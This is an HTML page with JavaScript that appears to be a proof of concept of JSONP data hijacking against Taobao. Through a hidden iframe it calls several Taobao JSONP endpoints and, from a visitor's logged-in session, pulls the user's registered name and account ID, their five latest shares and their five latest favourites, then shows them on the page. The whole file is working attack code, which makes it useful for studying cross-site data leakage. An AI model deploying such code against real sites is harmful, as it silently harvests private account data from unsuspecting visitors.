<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
    <script src="http://code.jquery.com/jquery-1.8.3.min.js"></script>
</head>
<body>
    <div id="log"></div>
    <iframe src="about:blank" id="i" style="display:none;"></iframe>
    <script>
        function log(text){
            document.getElementById('log').innerHTML += text + '<br><br>';
        }

        function getUserName(data){
            var html = $(data.result.html);
            var name = html.find('.name');
            var userId = '';
            var no_login = true;
            if(name.size() != 0){
                name = name.html();
                log('淘宝上注册的名字: ' + name);
                userId = html.find('.user a:eq(0)').attr('href');
                userId = userId.match(/u\/([^\/]+)\/front\.htm$/);
                if(userId && userId[1]){
                    userId = userId[1];
                    log('淘宝分配的ID: ' + userId);
                    query('http://fx.taobao.com//u/'+userId+'/tlive/share_item_list.htm?referer=&callback=parent.getShareList');
                }else{
                    log('get user id error');
                }
            }else{
                log('你没登录淘宝')    
            }
        }

        function getShareList(data){
            console.log(data);
            log('最新五条分享:::::');
            $.each(data.data,function(index,item){
                log(item.date + '/' + item.title);
            });
            queryAndCallback('http://favorite.taobao.com/collect_list_for_im_json.htm?size=5&t=1356145614050','parent.getCollect')
        }

        function getCollect(data){
            console.log(data);
            log('最新五条收藏:::::');
            $.each(data.collectList,function(index,item){
                log(item.remainTime + '/' + item.title);
            });
        }

        function query(url){
            var i = document.getElementById('i');
            i.src = "javascript:'<script src="+ url +"><\/script>'";
        }

        function queryAndCallback(url,cb){
            var i = document.getElementById('i');
            i.src = "javascript:'<script src="+ url +"><\/script><script>parent."+cb+"(result);<\/script>'";
        }

        query('http://comment.jianghu.taobao.com/json/cc_list.htm?_input_charset=utf-8&canFwd=0&view=taodan_detail_list&isJsonp=true&callback=parent.getUserName');
    </script>
</body>
</html>

